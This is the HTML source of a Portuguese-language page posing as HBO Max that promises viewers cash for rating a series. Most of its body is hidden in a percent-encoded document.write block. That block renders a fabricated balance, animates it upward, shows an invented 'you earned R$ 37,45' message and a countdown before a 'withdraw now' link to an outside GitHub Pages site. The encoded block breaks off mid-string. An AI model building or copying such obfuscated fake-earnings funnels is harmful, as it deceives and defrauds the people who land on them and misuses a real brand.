<!DOCTYPE html><html lang="pt-br"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <title>HBO Max</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link rel="stylesheet" href="css/Je7Fw1E2VMhU.css" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap" rel="stylesheet">
    <link href="https://fonts.cdnfonts.com/css/sf-pro-display" rel="stylesheet">
    <style>

html, body {
        overflow-x: hidden;
        }


        #netflixlogoapp{
            width: 100px;
            margin: 20px;
            margin-top: 25px;
        }
        *{
            margin: 0px;
            font-family: 'SF Pro Display', sans-serif;
            font-weight: 700;
            padding: 0px;
        }
        body{
            background-image: linear-gradient(to bottom, #040f50, #0c0932, #0c0528);
        }
        #barranetflix{
            background: linear-gradient( #000000, rgba(12, 12, 12, 0));
            display: flex;
            justify-content: space-between;
            margin: 0px;
        }
        #bannerprincipal{
            background-image: url('images/rjjnIc5FHCYf.png') ;
            background-position: center; /* Center the image */
            background-repeat: no-repeat; /* Do not repeat the image */
            background-size: cover;
        }
        #textoprincipal{
            color: white;
            width: 95%;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            text-align: center;
            font-size: 27px;
        }
        #ganheassistindocaixa{
            padding: 5px;
            text-align: center;
            font-size: 23px;
            margin-bottom: 10px;
            font-weight: 700;
            margin-top: 10px;
            background-color: rgb(211, 15, 15);
            width: 60%;
        }
        #textodetalhelogin{
            font-size: 15px;
            margin-top: 20px;
            font-weight: 500;
        }
        #inputtypetext{
            border: 1px solid rgba(255, 255, 255, 0.616);
            background: linear-gradient(135deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0));
            backdrop-filter: blur(10px);
            -webkit-backdrop-filter: blur(10px);
            -webkit-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            -moz-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37);
            border:1px solid rgba(255, 255, 255, 0.18);
            color: white;
            width: 80%;
            border-radius: 10px;
            margin-top: 20px;
            padding: 13px 15px;
            font-weight: 700;
        }
        #inputtypetextx{
            border: 2px solid #acacac;
            background: linear-gradient(135deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0));
            backdrop-filter: blur(10px);
            -webkit-backdrop-filter: blur(10px);
            -webkit-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            -moz-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37);
            border:1px solid rgba(255, 255, 255, 0.18);
            color: white;
            width: 90%;
            border-radius: 14px;
            margin-top: 20px;
            padding: 13px 30px;
            font-weight: 700;
        }
        #inputtypetextx:hover{
            background-color: #002be7;
            color: white;
            width: 90%;
            border-radius: 14px;
            margin-top: 20px;
            padding: 13px 30px;
            font-weight: 700;
        }
        a{
            text-decoration: none;
        }
        #botaoproximaetapa{
            padding: 15px;
        font-weight: 700;
        width: 80%;
        margin-top: 20px;
        color: white;
        border-radius: 15px;
        font-size: 18px;
        background-color: #002be7;
        text-align: center;
        display: inline-block;
        text-decoration: none;

        /* Animação de respiração ajustada */
        animation: breathing 2s ease-in-out infinite;
        }

        @keyframes breathing {
        0% {
        transform: scale(1);
        }
        50% {
        transform: scale(1.03); /* Reduzi a escala para evitar problemas de layout */
        }
        100% {
        transform: scale(1);
        }
        }


        #botaoproximaetapaa{
            padding: 10px;
            font-weight: 700;
            width: 70%;
            margin-top: 10px;
            color: rgb(211, 15, 15);
            border-radius: 5px;
            font-size: 18px;
            background-color: rgb(41, 3, 3);
            border: 1px solid rgb(211, 15, 15);
        }
        #botaolucraretapa{
            background: linear-gradient(rgb(0, 0, 0, 0), #040f50);
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 0px 0px 20px 0px;
            text-align: center;
        }
        #botaolucraretapaa{
            display: flex;
            justify-content: center;
            margin-top: -90px;
            align-items: center;
            padding: 0px 0px 20px 0px;
            text-align: center;
        }
        #informativo{
            padding: 10px;
            margin: 10px;
            margin-top: 5px;
            display: flex;
            margin-left:  -150px;
            justify-content: center;
            align-items: center;
            border-radius: 5px;
            height: 200px;
        }
        #pipocanetflix{
            width: 30px;
        }
        #dinheirologo{
            width: 60px;
        }
        .tvnetflix{
            width: 90%;
        }
        #tvnetflixaax{
            width: 250px;
        }
        #tvnetflixapp{
            width: 150px;
            height: 150px;
            position: relative;
        }
        #videomp4net{
            width: 200px;
            margin-left: 50px;
            margin-top: 30px;
        }
        #informativo div:first-child {
            width: 150px;
            height: 150px;
            position: relative;
        }
        #informativo div:last-child {
            width: 150px;
            height: 150px;
            position: relative;
            margin-top: -150px;
            margin-left: 20px;
        }
        #textodetalhelogindd{
            color: white;
            padding: 30px;
            font-size: 19px;
            font-weight: 600;
            margin-top: -35px;
            text-align: center;
        }
        footer{
            background-color: #040f50;
            color: white;
            height: 120px;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }
        #saldolead{
            margin-right: 20px;
            padding: 14px 20px;
            height: 15px;
            border-radius: 10px;
            display: flex;
            margin-top:15px;
            justify-content: center;
            align-items: center;
            color: white;
            z-index: 9999;
            background-color: rgb(76, 175, 80);
            transition: background-color 2s ease-in-out; /* Transição suave de cor */
        }

        .rating{
        transform: translate(-50%,-50%) rotateY(180deg);
        display: flex;
        justify-content: center;
        align-items: center;
        margin-top: 30px;
        margin-left: 60%;
        margin-bottom: -20px;
        }

        .rating input{
        display: none;
        }

        .rating label{
            display: block;
            cursor: pointer;
            width: 50px;
        }

        .rating label:before{
        content: '\f005';
        font-family: fontAwesome;
        position: relative;
        display: block;
        font-size: 50px;
        color: #555555;
        }

        .rating label:after{
        content: '\f005';
        font-family: fontAwesome;
        position: absolute;
        display: block;
        font-size: 50px;
        color:#FFD700;
        top: 0;
        opacity: 0;
        transition: .5;
        text-shadow: 0 4px 5px #332b00;
        }
        .rating label:hover:after,
        .rating label:hover ~ label:after,
        .rating input:checked ~ label:after{
        opacity: 1;
        }
        #avaliacaotexto{
            color: white;
            font-size: 15px;
            font-weight: 500;
            text-align: center;
        }
        #avaloacaoserie{
            margin-top: 5px;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }
        #youtubevideo{
            margin: 10px;
            width: 100%;
            border-radius: 20px;
            display: flex;
            justify-content: center;
            margin-left: 7%;
            align-items: center;
            -webkit-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            -moz-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
        }
        #simounaonet{
            display: flex;
            width: 85%;
            justify-content: space-between;
            align-items: center;
        }

        /* Estilo do popup */
        #popupBackground {
            display: none; /* Inicialmente oculto */
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.7);
            justify-content: center;
            align-items: center;
            z-index: 1000;
            opacity: 0; /* Inicialmente invisível */
            transition: opacity 0.5s ease; /* Transição suave para aparecer/desaparecer */
        }

        #popupContent {
            background: linear-gradient(135deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0));
            backdrop-filter: blur(10px);
            -webkit-backdrop-filter: blur(10px);
            -webkit-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            -moz-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37);
            border:1px solid rgba(255, 255, 255, 0.18);
            padding: 20px;
            border-radius: 15px;
            text-align: center;
            max-width: 400px;
            width: 80%;
        }

        /* Estilo do botão de prosseguir no popup */
        #prosseguir {
            display: inline-block;
            padding: 10px 20px;
            background-color: gray;
            color: white;
            text-decoration: none;
            border-radius: 15px;
            font-size: 16px;
            cursor: not-allowed;
            margin-top: 20px;
            pointer-events: none; /* Desabilita o botão inicialmente */
            transition: background-color 0.3s ease;
            margin-bottom: 10px;
        }

        /* Estilo do botão de prosseguir quando habilitado */
        #prosseguir.enabled {
            background-color: #4CAF50;
            cursor: pointer;
            pointer-events: auto;
        }

        #popuptexto{
            color: white;
            margin-top: 20px;
            font-size: 20px;
        }

        #popuptexto2{
            background: rgb(83, 216, 112);
            color: rgb(10, 61, 5);
            border-radius: 10px;
            margin-right: 10px;
            margin-left: 10px;
            padding: 10px;
            font-size: 12px;
            margin-bottom: 15px;
        }

        #popuptexto3{
            color: white;
        }

        #linha-horizontal {
        width: 200px;
        border: 1px solid #858585;
        margin: 0 auto;
        margin-top: 15px;
        margin-bottom: 20px;
        }



    </style>
</head>
<body>

    <div id="popupBackground">
        <div id="popupContent">
            <img src="images/6364343.png" style="width: 80px" ;="" id="pixlogo" alt="pixlogo">
            <p id="popuptexto">Parabéns pelas Avaliações, seu saque foi liberado em nosso sistema!</p>

            <div id="linha-horizontal"></div>

            <p id="popuptexto2">Você poderá sacar seu saldo agora mesmo!</p>
            <p id="popuptexto3">Quer prosseguir com seu Saque?</p>
            <a href="https://abreaqui.github.io/hbomax11 " id="prosseguir" onclick="fecharPopup()">SACAR AGORA</a>
        </div>
    </div>

    <script language="Javascript">
        <!--SAI DAQUI TOPO DE FUNIL-->
        <!--
        document.write(unescape('%20%20%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%2F%2F%20%46%75%6E%E7%E3%6F%20%70%61%72%61%20%6D%6F%73%74%72%61%72%20%6F%20%70%6F%70%75%70%0A%20%20%20%20%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%73%74%72%61%72%50%6F%70%75%70%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%70%6F%70%75%70%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%70%6F%70%75%70%42%61%63%6B%67%72%6F%75%6E%64%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%70%72%6F%73%73%65%67%75%69%72%42%75%74%74%6F%6E%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%70%72%6F%73%73%65%67%75%69%72%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%69%6E%69%74%69%61%6C%53%65%63%6F%6E%64%73%20%3D%20%35%3B%20%2F%2F%20%53%65%67%75%6E%64%6F%73%20%64%65%20%65%73%70%65%72%61%0A%20%20%20%20%20%20%20%20%20%20%20%20%6C%65%74%20%73%65%63%6F%6E%64%73%4C%65%66%74%20%3D%20%69%6E%69%74%69%61%6C%53%65%63%6F%6E%64%73%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%6F%70%75%70%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%66%6C%65%78%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%73%65%74%54%69%6D%65%6F%75%74%28%28%29%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%6F%70%75%70%2E%73%74%79%6C%65%2E%6F%70%61%63%69%74%79%20%3D%20%27%31%27%3B%20%2F%2F%20%46%61%7A%20%6F%20%70%6F%70%75%70%20%61%70%61%72%65%63%65%72%20%73%75%61%76%65%6D%65%6E%74%65%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%20%31%30%29%3B%20%2F%2F%20%44%65%6C%61%79%20%70%65%71%75%65%6E%6F%20%70%61%72%61%20%70%65%72%6D%69%74%69%72%20%61%20%74%72%61%6E%73%69%E7%E3%6F%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%41%74%75%61%6C%69%7A%61%20%6F%20%74%65%78%74%6F%20%64%6F%20%62%6F%74%E3%6F%20%61%20%63%61%64%61%20%73%65%67%75%6E%64%6F%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%63%6F%75%6E%74%64%6F%77%6E%49%6E%74%65%72%76%61%6C%20%3D%20%73%65%74%49%6E%74%65%72%76%61%6C%28%28%29%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%63%6F%6E%64%73%4C%65%66%74%2D%2D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%72%6F%73%73%65%67%75%69%72%42%75%74%74%6F%6E%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%60%53%41%43%41%52%20%41%47%4F%52%41%20%28%24%7B%73%65%63%6F%6E%64%73%4C%65%66%74%7D%73%29%60%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%73%65%63%6F%6E%64%73%4C%65%66%74%20%3C%3D%20%30%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%63%6F%75%6E%74%64%6F%77%6E%49%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%72%6F%73%73%65%67%75%69%72%42%75%74%74%6F%6E%2E%63%6C%61%73%73%4C%69%73%74%2E%61%64%64%28%27%65%6E%61%62%6C%65%64%27%29%3B%20%2F%2F%20%48%61%62%69%6C%69%74%61%20%6F%20%62%6F%74%E3%6F%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%72%6F%73%73%65%67%75%69%72%42%75%74%74%6F%6E%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%27%53%41%43%41%52%20%41%47%4F%52%41%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%20%31%30%30%30%29%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%54%65%6D%70%6F%72%69%7A%61%64%6F%72%20%64%65%20%35%20%73%65%67%75%6E%64%6F%73%20%61%6E%74%65%73%20%64%65%20%68%61%62%69%6C%69%74%61%72%20%6F%20%62%6F%74%E3%6F%0A%20%20%20%20%20%20%20%20%20%20%20%20%73%65%74%54%69%6D%65%6F%75%74%28%28%29%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%72%6F%73%73%65%67%75%69%72%42%75%74%74%6F%6E%2E%63%6C%61%73%73%4C%69%73%74%2E%61%64%64%28%27%65%6E%61%62%6C%65%64%27%29%3B%20%2F%2F%20%48%61%62%69%6C%69%74%61%20%6F%20%62%6F%74%E3%6F%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%72%6F%73%73%65%67%75%69%72%42%75%74%74%6F%6E%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%27%53%41%43%41%52%20%41%47%4F%52%41%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%20%69%6E%69%74%69%61%6C%53%65%63%6F%6E%64%73%20%2A%20%31%30%30%30%29%3B%20%2F%2F%20%35%20%73%65%67%75%6E%64%6F%73%20%28%35%30%30%30%20%6D%69%6C%69%73%73%65%67%75%6E%64%6F%73%29%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20%2F%2F%20%46%75%6E%E7%E3%6F%20%70%61%72%61%20%66%65%63%68%61%72%20%6F%20%70%6F%70%75%70%0A%20%20%20%20%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%66%65%63%68%61%72%50%6F%70%75%70%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%70%6F%70%75%70%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%70%6F%70%75%70%42%61%63%6B%67%72%6F%75%6E%64%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%6F%70%75%70%2E%73%74%79%6C%65%2E%6F%70%61%63%69%74%79%20%3D%20%27%30%27%3B%20%2F%2F%20%46%61%7A%20%6F%20%70%6F%70%75%70%20%64%65%73%61%70%61%72%65%63%65%72%20%73%75%61%76%65%6D%65%6E%74%65%0A%20%20%20%20%20%20%20%20%20%20%20%20%73%65%74%54%69%6D%65%6F%75%74%28%28%29%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%6F%70%75%70%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%20%35%30%30%29%3B%20%2F%2F%20%54%65%6D%70%6F%20%64%65%20%65%73%70%65%72%61%20%70%61%72%61%20%65%73%63%6F%6E%64%65%72%20%61%70%F3%73%20%61%20%74%72%61%6E%73%69%E7%E3%6F%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%0A%0A%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%62%61%6E%6E%65%72%70%72%69%6E%63%69%70%61%6C%22%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%62%61%72%72%61%6E%65%74%66%6C%69%78%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%61%53%52%72%6A%53%35%41%62%6F%51%79%2E%70%6E%67%22%20%69%64%3D%22%6E%65%74%66%6C%69%78%6C%6F%67%6F%61%70%70%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%73%61%6C%64%6F%6C%65%61%64%22%3E%53%61%6C%64%6F%3A%20%52%24%20%3C%62%20%69%64%3D%22%73%61%6C%64%6F%56%61%6C%6F%72%22%3E%32%38%31%2C%33%31%3C%2F%62%3E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%0A%3C%73%63%72%69%70%74%3E%0A%66%75%6E%63%74%69%6F%6E%20%61%6E%69%6D%61%72%53%61%6C%64%6F%28%29%20%7B%0A%20%20%20%20%6C%65%74%20%73%61%6C%64%6F%41%74%75%61%6C%20%3D%20%32%38%31%2E%33%31%3B%0A%20%20%20%20%6C%65%74%20%73%61%6C%64%6F%46%69%6E%61%6C%20%3D%20%33%31%38%2E%37%36%3B%0A%20%20%20%20%6C%65%74%20%69%6E%63%72%65%6D%65%6E%74%6F%20%3D%20%30%2E%31%3B%20%2F%2F%20%51%75%61%6E%74%6F%20%63%61%64%61%20%69%6E%63%72%65%6D%65%6E%74%6F%20%61%64%69%63%69%6F%6E%61%20%61%6F%20%73%61%6C%64%6F%0A%20%20%20%20%6C%65%74%20%69%6E%74%65%72%76%61%6C%6F%20%3D%20%31%30%3B%20%2F%2F%20%54%65%6D%70%6F%20%65%6D%20%6D%69%6C%69%73%73%65%67%75%6E%64%6F%73%20%65%6E%74%72%65%20%6F%73%20%69%6E%63%72%65%6D%65%6E%74%6F%73%0A%0A%20%20%20%20%2F%2F%20%41%64%69%63%69%6F%6E%61%20%66%75%6E%64%6F%20%76%65%72%64%65%20%61%6F%20%73%61%6C%64%6F%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%73%61%6C%64%6F%6C%65%61%64%27%29%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%43%6F%6C%6F%72%20%3D%20%27%23%34%43%41%46%35%30%27%3B%0A%0A%20%20%20%20%6C%65%74%20%69%6E%74%65%72%76%61%6C%6F%49%44%20%3D%20%73%65%74%49%6E%74%65%72%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%0A%20%20%20%20%20%20%20%20%73%61%6C%64%6F%41%74%75%61%6C%20%2B%3D%20%69%6E%63%72%65%6D%65%6E%74%6F%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%73%61%6C%64%6F%41%74%75%61%6C%20%3E%3D%20%73%61%6C%64%6F%46%69%6E%61%6C%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%73%61%6C%64%6F%41%74%75%61%6C%20%3D%20%73%61%6C%64%6F%46%69%6E%61%6C%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%6F%49%44%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%73%61%6C%64%6F%56%61%6C%6F%72%27%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%73%61%6C%64%6F%41%74%75%61%6C%2E%74%6F%46%69%78%65%64%28%32%29%2E%72%65%70%6C%61%63%65%28%27%2E%27%2C%20%27%2C%27%29%3B%0A%20%20%20%20%7D%2C%20%69%6E%74%65%72%76%61%6C%6F%29%3B%0A%7D%0A%0A%66%75%6E%63%74%69%6F%6E%20%74%6F%63%61%72%41%75%64%69%6F%28%29%20%7B%0A%20%20%20%20%76%61%72%20%61%75%64%69%6F%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%61%75%64%69%6F%53%75%63%65%73%73%6F%22%29%3B%0A%20%20%20%20%61%75%64%69%6F%2E%70%6C%61%79%28%29%3B%0A%7D%0A%0A%3C%2F%73%63%72%69%70%74%3E%0A%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6E%6F%74%69%66%69%63%61%63%61%6F%64%69%6E%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%73%74%79%6C%65%3D%22%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%20%23%30%39%30%61%34%31%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%6F%72%64%65%72%3A%20%31%70%78%20%73%6F%6C%69%64%20%23%33%61%33%64%63%34%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%6D%61%72%67%69%6E%3A%20%31%30%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%31%35%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6C%6F%72%3A%20%23%66%66%66%66%66%66%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%61%64%64%69%6E%67%3A%20%31%30%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%64%69%73%70%6C%61%79%3A%20%66%6C%65%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6C%65%78%2D%64%69%72%65%63%74%69%6F%6E%3A%20%63%6F%6C%75%6D%6E%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%6A%75%73%74%69%66%79%2D%63%6F%6E%74%65%6E%74%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%61%6C%69%67%6E%2D%69%74%65%6D%73%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%61%6E%69%6D%61%74%69%6F%6E%3A%20%62%72%65%61%74%68%69%6E%67%20%33%73%20%65%61%73%65%2D%69%6E%2D%6F%75%74%20%69%6E%66%69%6E%69%74%65%3B%22%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%69%64%3D%22%74%65%78%74%6F%6E%6F%74%69%66%69%22%3E%56%6F%63%EA%20%67%61%6E%68%6F%75%20%3C%62%3E%52%24%20%33%37%2C%34%35%3C%2F%62%3E%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%3E%41%73%73%69%73%74%61%20%3C%62%3E%31%20%73%E9%72%69%65%3C%2F%62%3E%20%65%20%72%65%61%6C%69%7A%65%20%73%65%75%20%73%61%71%75%65%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%74%65%78%74%6F%70%72%69%6E%63%69%70%61%6C%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%79%6F%75%74%75%62%65%2D%76%69%64%65%6F%20%69%64%3D%22%79%6F%75%74%75%62%65%76%69%64%65%6F%22%20%76%69%64%65%6F%2D%69%64%3D%22%37%59%63%51%70%52%68%74%61%36%51%22%20%73%74%79%6C%65%3D%22%77%69%64%74%68%3A%20%37%32%30%70%78%3B%22%3E%3C%2F%79%6F%75%74%75%62%65%2D%76%69%64%65%6F%3E%0A%0A%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%61%76%61%6C%6F%61%63%61%6F%73%65%72%69%65%22%3E%0A%20%20%20%20%20%20%20%20%3C%70%20%69%64%3D%22%61%76%61%6C%69%61%63%61%6F%74%65%78%74%6F%22%3E%41%76%61%6C%69%65%20%65%73%74%61%20%73%E9%72%69%65%3A%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%72%61%74%69%6E%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%72%61%64%69%6F%22%20%6E%61%6D%65%3D%22%73%74%61%72%22%20%69%64%3D%22%73%74%61%72%31%22%3E%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%73%74%61%72%31%22%3E%3C%2F%6C%61%62%65%6C%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%72%61%64%69%6F%22%20%6E%61%6D%65%3D%22%73%74%61%72%22%20%69%64%3D%22%73%74%61%72%32%22%3E%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%73%74%61%72%32%22%3E%3C%2F%6C%61%62%65%6C%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%72%61%64%69%6F%22%20%6E%61%6D%65%3D%22%73%74%61%72%22%20%69%64%3D%22%73%74%61%72%33%22%3E%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%73%74%61%72%33%22%3E%3C%2F%6C%61%62%65%6C%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%72%61%64%69%6F%22%20%6E%61%6D%65%3D%22%73%74%61%72%22%20%69%64%3D%22%73%74%61%72%34%22%3E%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%73%74%61%72%34%22%3E%3C%2F%6C%61%62%65%6C%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%72%61%64%69%6F%22%20%6E%61%6D%65%3D%22%73%74%61%72%22%20%69%64%3D%22%73%74%61%72%35%22%3E%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%73%74%61%72%35%22%3E%3C%2F%6C%61%62%65%6C%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%0A%20%20%20%20%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%61%76%61%6C%6F%61%63%61%6F%73%65%72%69%65%22%3E%0A%20%20%20%20%20%20%20%20%3C%70%20%69%64%3D%22%61%76%61%6C%69%61%63%61%6F%74%65%78%74%6F%22%3E%44%65%69%78%65%20%73%75%61%20%6F%70%69%6E%69%E3%6F%20%73%6F%62%72%65%20%61%20%73%E9%72%69%65%3A%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%69%64%3D%22%69%6E%70%75%74%74%79%70%65%74%65%78%74%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%45%73%63%72%65%76%61%20%61%71%75%69%22%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%61%76%61%6C%6F%61%63%61%6F%73%65%72%69%65%22%3E%0A%20%20%20%20%20%20%20%20%3C%70%20%69%64%3D%22%61%76%61%6C%69%61%63%61%6F%74%65%78%74%6F%22%3E%52%65%63%6F%6D%65%6E%64%61%72%69%61%20%65%73%74%61%20%73%E9%72%69%65%20%70%61%72%61%3C%62%72%3E%61%73%73%69%6E%61%6E%74%65%73%20%48%42%4F%20%4D%61%78%3F%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%73%69%6D%6F%75%6E%61%6F%6E%65%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%74%65%78%74%22%20%69%64%3D%22%69%6E%70%75%74%74%79%70%65%74%65%78%74%78%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%45%73%63%72%65%76%61%20%61%71%75%69%2E%2E%2E%22%3E%53%69%6D%3C%2F%62%75%74%74%6F%6E%3E%0A